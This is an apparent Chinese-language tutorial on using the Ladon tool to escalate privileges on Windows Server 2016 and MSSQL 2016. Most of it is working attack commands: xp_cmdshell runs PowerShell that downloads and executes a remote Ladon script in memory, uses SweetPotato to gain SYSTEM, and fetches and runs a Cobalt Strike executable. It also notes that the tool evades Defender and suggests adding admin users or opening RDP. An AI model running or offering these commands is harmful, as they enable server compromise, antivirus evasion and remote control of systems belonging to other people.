〖教程〗Ladon提權Win2016/Win10/MSSQL2016

測試環境

Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]

Ladon本地用戶權限提權

網上找了些LPE，發現直接被Defender殺，病毒庫更新至2021.1.19，Ladon沒被殺，管理員UAC權限可通過BypassUac提權

MSSQL遠程加載Ladon提權

執行SQL查詢權限爲network service

遠程內存加載PowerLadon提權

exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxxxx.800/Ladon.ps1''); Ladon SweetPotato "whoami""'

ECHO寫入BAT執行多行命令提權

exec master..xp_cmdshell 'echo whoami > c:\users\public\test.bat'

可ECHO寫入添加管理員用戶命令或者開3389等操作（舉一反三不要只懂WHOAMI）

使用SYSTEM權限執行BAT

exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\test.bat""'

Wget下載Coblat Strkie的EXE

exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon wget http://k8gege.org/cs.exe"'

使用SYSTEM權限執行CS

exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\cs.exe""'

工具下載

最新版本：https://k8gege.org/Download
歷史版本: https://github.com/k8gege/Ladon/releases